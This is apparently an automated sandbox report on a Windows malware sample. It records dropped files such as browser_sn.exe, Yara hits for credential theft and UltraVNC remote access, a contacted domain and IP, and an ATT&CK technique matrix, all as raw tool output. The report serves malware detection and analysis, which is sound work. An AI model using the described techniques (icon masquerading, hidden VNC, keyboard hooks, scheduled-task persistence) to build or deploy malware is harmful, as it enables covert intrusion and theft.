                            Source: T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: vncmenu.cpp : ########### Shell_TrayWnd found %i
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Location: // basicwinhttp.dllWinHttpGetIEProxyConfigForCurrentUser;http=https==UltraVNC.ini -settingshelperWinsta0\DefaultShell_TrayWndpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-57B0D07B8C7C}{34F673E0-878F-11D5-B98A-00B0D07B8C7C}0~
                            Source: browser_sn.exe, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Program Manager
                            Source: browser_sn.exe, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Shell_TrayWnd
                            Source: browser_sn.exe, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Progman
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: WTSUnRegisterSessionNotificationvncmenu.cpp : ########### Shell_TrayWnd found %i
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_00402187
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00401815 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401815
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C99EF0 GetProcessWindowStation,GetUserObjectInformationA,GetLastError,SetLastError,RevertToSelf,GetUserNameA,GetLastError,GetLastError,24_2_00007FF790C99EF0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790CEDF80 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,24_2_00007FF790CEDF80
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00405721 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,_wtol,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00405721

                            Stealing of Sensitive Information

                            barindex
                            Source: Yara matchFile source: 37.2.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 24.0.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 35.2.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.0.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 37.0.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 24.2.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 35.0.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000003.1293861913.000000000296C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000023.00000002.2541200831.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000000.1476676478.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000025.00000000.1645104841.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000023.00000000.1563639485.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1294187731.000000000096B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.1480308642.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000025.00000002.1647604214.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000000.1393570628.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: T8xrZb7nBL.exe PID: 7460, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: browser_sn.exe PID: 8328, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: browser_sn.exe PID: 8704, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: browser_sn.exe PID: 8944, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: browser_sn.exe PID: 9020, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Windows\Tasks\browser_sn.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\Tasks\Xv6Ya.d8LhT, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Source: Yara matchFile source: 37.2.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 24.0.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 35.2.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.0.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 37.0.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 24.2.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 35.0.browser_sn.exe.7ff790c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000003.1293861913.000000000296C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000023.00000002.2541200831.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000000.1476676478.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000025.00000000.1645104841.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000023.00000000.1563639485.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1294187731.000000000096B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.1480308642.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000025.00000002.1647604214.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000000.1393570628.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: T8xrZb7nBL.exe PID: 7460, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: browser_sn.exe PID: 8328, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: browser_sn.exe PID: 8704, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: browser_sn.exe PID: 8944, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: browser_sn.exe PID: 9020, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Windows\Tasks\browser_sn.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\Tasks\Xv6Ya.d8LhT, type: DROPPED
                            Source: browser_sn.exe, 00000018.00000002.1545761810.000000000261A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.008
                            Source: browser_sn.exe, 00000023.00000003.1759022979.000000000272A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.008
                            Source: browser_sn.exe, 00000023.00000002.2540148339.0000000002720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.008
                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire Infrastructure1
                            Valid Accounts
                            1
                            Windows Management Instrumentation
                            1
                            DLL Side-Loading
                            1
                            Exploitation for Privilege Escalation
                            1
                            Disable or Modify Tools
                            121
                            Input Capture
                            2
                            System Time Discovery
                            1
                            Remote Desktop Protocol
                            1
                            Archive Collected Data
                            1
                            Ingress Tool Transfer
                            Exfiltration Over Other Network Medium1
                            System Shutdown/Reboot
                            CredentialsDomainsDefault Accounts2
                            Native API
                            1
                            Valid Accounts
                            1
                            DLL Side-Loading
                            1
                            Deobfuscate/Decode Files or Information
                            LSASS Memory1
                            Account Discovery
                            Remote Desktop Protocol1
                            Screen Capture
                            12
                            Encrypted Channel
                            Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts2
                            Command and Scripting Interpreter
                            11
                            Windows Service
                            1
                            Valid Accounts
                            2
                            Obfuscated Files or Information
                            Security Account Manager1
                            System Service Discovery
                            SMB/Windows Admin Shares121
                            Input Capture
                            1
                            Remote Access Software
                            Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal Accounts1
                            Scheduled Task/Job
                            1
                            Scheduled Task/Job
                            11
                            Access Token Manipulation
                            1
                            Timestomp
                            NTDS4
                            File and Directory Discovery
                            Distributed Component Object Model3
                            Clipboard Data
                            1
                            Non-Application Layer Protocol
                            Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud Accounts1
                            Service Execution
                            1
                            Bootkit
                            11
                            Windows Service
                            1
                            DLL Side-Loading
                            LSA Secrets26
                            System Information Discovery
                            SSHKeylogging2
                            Application Layer Protocol
                            Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts22
                            Process Injection
                            231
                            Masquerading
                            Cached Domain Credentials31
                            Security Software Discovery
                            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                            Scheduled Task/Job
                            1
                            Valid Accounts
                            DCSync1
                            Virtualization/Sandbox Evasion
                            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                            Virtualization/Sandbox Evasion
                            Proc Filesystem3
                            Process Discovery
                            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                            Access Token Manipulation
                            /etc/passwd and /etc/shadow11
                            Application Window Discovery
                            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron22
                            Process Injection
                            Network Sniffing1
                            System Owner/User Discovery
                            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                            Bootkit
                            Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579878 Sample: T8xrZb7nBL.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 84 64 tbdcic.info 2->64 66 x1.i.lencr.org 2->66 68 bg.microsoft.map.fastly.net 2->68 72 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->72 74 Yara detected UltraVNC Hacktool 2->74 76 AI detected suspicious sample 2->76 78 3 other signatures 2->78 10 T8xrZb7nBL.exe 9 2->10         started        signatures3 process4 file5 52 C:\Users\user\AppData\Local\...\Xv6Ya.d8LhT, PE32+ 10->52 dropped 54 C:\Users\user\AppData\Local\...\uqVb3.kkb9h, PE32+ 10->54 dropped 86 Contains functionality to register a low level keyboard hook 10->86 14 cmd.exe 3 6 10->14         started        17 cmd.exe 7 10->17         started        19 cmd.exe 2 10->19         started        21 cmd.exe 2 10->21         started        signatures6 process7 file8 56 C:\Windows\Tasks\conhost.exe, PE32+ 14->56 dropped 58 C:\Windows\Tasks\browser_sn.exe, PE32+ 14->58 dropped 23 cmd.exe 14->23         started        26 browser_sn.exe 14->26         started        29 Acrobat.exe 18 73 14->29         started        37 12 other processes 14->37 60 C:\Windows\Tasks\Xv6Ya.d8LhT, PE32+ 17->60 dropped 62 C:\Windows\Tasks\uqVb3.kkb9h, PE32+ 17->62 dropped 31 conhost.exe 17->31         started        33 conhost.exe 19->33         started        35 conhost.exe 21->35         started        process9 dnsIp10 80 Drops executables to the windows directory (C:\Windows) and starts them 23->80 39 browser_sn.exe 23->39         started        42 timeout.exe 23->42         started        44 taskkill.exe 23->44         started        48 4 other processes 23->48 70 tbdcic.info 194.190.152.201, 443, 49749, 49750 RSHB-ASRU Russian Federation 26->70 82 Contains VNC / remote desktop functionality (version string found) 26->82 46 AcroCEF.exe 101 29->46         started        signatures11 process12 signatures13 84 Contains VNC / remote desktop functionality (version string found) 39->84 50 AcroCEF.exe 46->50         started        process14

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand
                            SourceDetectionScannerLabelLink
                            T8xrZb7nBL.exe3%ReversingLabs
                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT0%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\7ZipSfx.000\uqVb3.kkb9h0%ReversingLabs
                            C:\Windows\Tasks\Xv6Ya.d8LhT0%ReversingLabs
                            C:\Windows\Tasks\browser_sn.exe0%ReversingLabs
                            C:\Windows\Tasks\conhost.exe0%ReversingLabs
                            C:\Windows\Tasks\uqVb3.kkb9h0%ReversingLabs
                            No Antivirus matches
                            No Antivirus matches
                            No Antivirus matches
                            NameIPActiveMaliciousAntivirus DetectionReputation
                            tbdcic.info
                            194.190.152.201
                            truetrue
                              unknown
                              bg.microsoft.map.fastly.net
                              199.232.210.172
                              truefalse
                                high
                                x1.i.lencr.org
                                unknown
                                unknownfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.uvnc.comT8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000296C000.00000004.00000020.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1294187731.000000000096B000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476676478.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2541200831.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1645104841.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drfalse
                                    high
                                    http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.15.drfalse
                                      high
                                      https://www.adobe.coReaderMessages.11.drfalse
                                        high
                                        http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drfalse
                                          high
                                          http://www.uvnc.comopenhttp://forum.uvnc.comnetT8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drfalse
                                            unknown
                                            http://crl.thawte.com/ThawteTimestampingCA.crl0T8xrZb7nBL.exe, 00000000.00000003.1294187731.0000000000979000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000297A000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drfalse
                                              high
                                              http://java.sun.com/products/plugin/index.html#downloadT8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drfalse
                                                high
                                                http://forum.uvnc.comT8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drfalse
                                                  unknown
                                                  http://ocsp.thawte.com0T8xrZb7nBL.exe, 00000000.00000003.1294187731.0000000000979000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000297A000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drfalse
                                                    high
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
